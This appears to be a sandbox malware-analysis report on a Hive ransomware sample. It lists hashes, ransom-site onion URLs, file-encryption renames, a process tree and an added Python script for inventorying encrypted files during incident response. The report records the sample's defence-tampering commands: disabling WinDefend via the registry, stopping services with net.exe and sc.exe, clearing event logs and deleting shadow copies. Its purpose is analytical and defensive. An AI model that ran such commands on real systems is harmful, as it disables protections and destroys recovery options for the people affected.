Analysis

max time kernel: 163s
max time network: 125s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 16:59

Static task: static1
Behavioral task: behavioral1
Sample: 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
Resource: win7-en-20211208
General

Target: 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
Size: 2.6MB
MD5: f37ac3d17e22b105ee4648676fb336b2
SHA1: 75c3d318d196aaf8c6b129ef10677b9495c1cfd6
SHA256: 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43
SHA512: cd08c48fa3646b610d28046ef9b75ca7418acc607f7408e1ad6fa1b9390e98e01e07e4be0dad131186c7027c6a1c4a058b6b7123812eb524a0a8d28802b458a2
Malware Config

Extracted from: C:\iotb_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all Defender AV definitions.
Processes:
MpCmdRun.exe, PID 4504

Hive
A ransomware family written in Go (Golang), first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes:
reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
A Start value of 4 is SERVICE_DISABLED, so the Windows Defender service (WinDefend) will not start on the next boot. The process tree below shows the same treatment applied to SecurityHealthService.

Clears Windows event logs (1 TTP)
No command line is recorded for this signature. The three wevtutil.exe instances (PIDs 4064, 3192, 4176) that acquired SeSecurityPrivilege and SeBackupPrivilege under "Suspicious use of AdjustPrivilegeToken" below are consistent with it.

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery. In this run vssadmin.exe (PID 3652, see "Interacts with shadow copies") and two wmic.exe instances (PIDs 4172, 4344) were launched; their command lines are not part of the captured process tree.

Modifies extensions of user files (16 IoCs)
Ransomware generally changes the extension on encrypted files. Here each encrypted file keeps its original name and gains a 56-character base64url-style token plus the extension .j2xnp; the first 44 characters of the token are identical for every file in this run and the last 12 differ per file.
Processes:
Process for all entries: 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
File renamed: C:\Users\Admin\Pictures\SuspendGroup.raw => C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp
File renamed: C:\Users\Admin\Pictures\InitializeRename.crw => C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp
File renamed: C:\Users\Admin\Pictures\OptimizeRename.raw => C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp
File renamed: C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff => C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp
File renamed: C:\Users\Admin\Pictures\SelectDebug.raw => C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp
File renamed: C:\Users\Admin\Pictures\DisableRepair.crw => C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp
File renamed: C:\Users\Admin\Pictures\SyncAssert.tif => C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp
File renamed: C:\Users\Admin\Pictures\CompareUninstall.png => C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp
File opened for modification: C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials. For a file encryptor this heuristic usually fires because browser profile files are among the files read and encrypted; no network exfiltration is recorded in this report.

Drops file in Program Files directory (64 IoCs)
Processes:
Process for all entries: 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-pl.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_CtuFolQ6xGE0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-200.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WXrcawFx_2Q0.j2xnp
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\iotb_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WEhlYkzA8EM0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_cardback.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-48_altform-unplated.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dkFSCA3qJmc0.j2xnp
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WJ6r73KGnOM0.j2xnp
File opened for modification: C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VpNJHtFK5Qk0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_20x20x32.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3009_32x32x32.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\resources.pri
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_M8AQ4flckP40.j2xnp
File opened for modification: C:\Program Files (x86)\Internet Explorer\es-ES\ieinstal.exe.mui
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Control_10.jpg
File opened for modification: C:\Program Files\Microsoft Office\root\Templates\1033\ContemporaryPhotoAlbum.potx.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_KZWkpXKGsNk0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxManifest.xml
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailBadge.scale-125.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_UX1uN7dth3Q0.j2xnp
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_ykmScO5HkiE0.j2xnp
File opened for modification: C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui
File created: C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\iotb_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_uTmkZukAU_Q0.j2xnp
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Zha7z8wgPHI0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png
File created: C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\iotb_HOW_TO_DECRYPT.txt
File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\iotb_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_J_em_jQ1DPM0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.dualsim2.surprise.small.scale-150.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_-GApP492Hv00.j2xnp
File opened for modification: C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipTsf.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_QW4M2iW4_Ds0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-125.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.News\Assets\news_button_down.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-256.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-200.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_lh994_VVNCk0.j2xnp
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VxylmRYVR3g0.j2xnp
File opened for modification: C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GB.XSL.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_kfXk-VELlvg0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FEsyvLrj3dk0.j2xnp
File created: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\iotb_HOW_TO_DECRYPT.txt
File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_hxE_XqRD4HU0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Aquarium\mask\1h.png
File opened for modification: C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_yCiK8woPxW40.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSmallTile.contrast-black_scale-200.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png
File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dEDn0gCdCsI0.j2xnp
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_I1aRWYAqGdk0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\settle.scale-140.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\time.png
File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_zTnuhdtL9LE0.j2xnp
File opened for modification: C:\Program Files (x86)\Common Files\System\ado\msador28.tlb
File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jZ0BdjJ05Eg0.j2xnp
File opened for modification: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-20.png
File opened for modification: C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd
File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WideTile.scale-100.png
File opened for modification: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml
File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_MGg0nr6cMIs0.j2xnp
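The two file lists above share one naming pattern: every encrypted file keeps its original name and gains a token followed by .j2xnp, while the ransom note iotb_HOW_TO_DECRYPT.txt is dropped into the same directories. The following is an added example, not code from the sandbox report or from Hive itself: a small parser that recovers original file names from that pattern and groups encrypted files by the part of the token that is constant across the run. The report does not say what the token encodes, so the code relies only on what is observable here (unpadded base64url, 56 characters, first 44 constant per run); the sample paths are copied from the lists above, the .j2xnp extension is treated as run-specific, and the 33-byte split point is an observation from this run, not a documented Hive constant.

```python
"""Parse the file names left behind in this Hive run (added example)."""
import base64
import re
from collections import defaultdict

# Constructed input: paths copied from the two IoC lists in this report,
# plus two files the encryptor did not rename (one of them the ransom note).
SAMPLE_PATHS = [
    r"C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp",
    r"C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp",
    r"C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp",
    r"C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_-GApP492Hv00.j2xnp",
    r"C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-200.png",
    r"C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\iotb_HOW_TO_DECRYPT.txt",
]

EXT = "j2xnp"          # extension seen in this run; assumed to vary per build
RUN_PREFIX_BYTES = 33  # observed here: the first 33 decoded bytes never change

# <original name>.<base64url token>.<EXT>; the token alphabet has no '.', so the
# split between original name and token is unambiguous.
NAME_RE = re.compile(r"^(?P<orig>.+)\.(?P<blob>[A-Za-z0-9_-]+)\." + re.escape(EXT) + r"$")


def parse_hive_name(path):
    """Return {'original': <path>, 'token': <str>, 'blob': <bytes>} or None.

    The directory is kept on 'original' so the result is directly usable when
    rebuilding an inventory of affected files for incident response.
    """
    directory, _, name = path.rpartition("\\")
    m = NAME_RE.match(name)
    if not m:
        return None
    token = m.group("blob")
    if len(token) % 4:          # the observed token is unpadded but quad-aligned
        return None
    try:
        blob = base64.urlsafe_b64decode(token)
    except ValueError:
        return None
    original = (directory + "\\" if directory else "") + m.group("orig")
    return {"original": original, "token": token, "blob": blob}


def split_run_and_file_parts(blob):
    """Split the decoded token into its run-constant and per-file parts."""
    return blob[:RUN_PREFIX_BYTES], blob[RUN_PREFIX_BYTES:]


def inventory(paths):
    """Group renamed files by run-constant token part; list untouched files.

    One run-constant key means one encryption run touched every file; the
    per-file part is recorded so files can be told apart without the name.
    """
    runs = defaultdict(list)
    untouched = []
    for p in paths:
        parsed = parse_hive_name(p)
        if parsed is None:
            untouched.append(p)
            continue
        run_part, file_part = split_run_and_file_parts(parsed["blob"])
        runs[run_part.hex()].append(
            {"original": parsed["original"], "file_part": file_part.hex()}
        )
    return {"runs": dict(runs), "untouched": untouched}


if __name__ == "__main__":
    inv = inventory(SAMPLE_PATHS)
    for run_key, files in inv["runs"].items():
        print(f"run {run_key[:16]}...: {len(files)} encrypted files")
        for f in files:
            print(f"  {f['file_part']}  {f['original']}")
    print("not renamed:", *inv["untouched"], sep="\n  ")
```

The negative cases matter as much as the positive ones: the Program Files list above contains many files that were only "opened for modification" and never renamed (the WindowsApps assets, for instance), and the ransom note itself; both fall through to untouched rather than being mistaken for encrypted files.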
Launches sc.exe
sc.exe is the Windows service-control utility. Here it sets the start type of each service stopped via net.exe to "disabled" (sc.exe config "<service>" start= disabled, see the process tree below), so the services do not come back after a reboot.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exe, PID 3652

Modifies registry class (3 IoCs)
EPP is the Windows Defender shell extension that provides the "Scan with Microsoft Defender" context-menu entry; deleting it under *, Directory and Drive removes that option from Explorer's right-click menu.
Processes:
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP

Opens file in notepad (likely ransom note) (1 IoC)
Processes:
notepad.exe, PID 616

Runs net.exe
Used here to stop nine services with net.exe stop "<service>" /y (see the process tree below).

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
powershell.exe, PID 3320 (3 events)
powershell.exe, PID 2868 (3 events)
3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe, PID 3376 (2 events)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (privileges enabled per process):
wevtutil.exe, PID 4064: SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe, PID 3192: SeSecurityPrivilege, SeBackupPrivilege
wevtutil.exe, PID 4176: SeSecurityPrivilege, SeBackupPrivilege
wmic.exe, PID 4172: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
wmic.exe, PID 4344 (first pass): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
wmic.exe, PID 4344 (second pass, list cut off at the 64-IoC limit): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
The numeric entries 33 to 36 are privilege LUIDs the sandbox did not resolve to names. The long wmic.exe lists are the full set wmic enables on startup and are not individually meaningful; the wevtutil.exe entries (SeSecurityPrivilege, SeBackupPrivilege) are the privileges needed to clear event logs.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source PID and image, target PID and image, number of writes):
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 2832 net.exe (3)
2832 net.exe -> 4152 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 4036 net.exe (3)
4036 net.exe -> 3080 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 3980 net.exe (3)
3980 net.exe -> 4196 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 4188 net.exe (3)
4188 net.exe -> 4396 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 4384 net.exe (3)
4384 net.exe -> 4436 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 4336 net.exe (3)
4336 net.exe -> 3228 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 3784 net.exe (3)
3784 net.exe -> 4508 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 4512 net.exe (3)
4512 net.exe -> 452 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 612 net.exe (3)
612 net.exe -> 840 net1.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 432 sc.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 1116 sc.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 1280 sc.exe (3)
3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe -> 1508 sc.exe (1, list cut off at the 64-IoC limit)
Every write targets a child the source had just spawned (each net.exe in turn writes into its own net1.exe helper), which is consistent with ordinary child-process creation rather than code injection; the value of this signature is the process-creation pattern it exposes.
Processes
-
Tree depth is given in brackets, "cmd:" is the recorded command line, and signature hits are listed beneath each process.
[1] C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe (PID 3376)
    cmd: "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"
    - Modifies extensions of user files
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\net.exe (PID 2832)
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 4152)
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 4036)
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 3080)
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 3980)
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 4196)
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 4188)
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 4396)
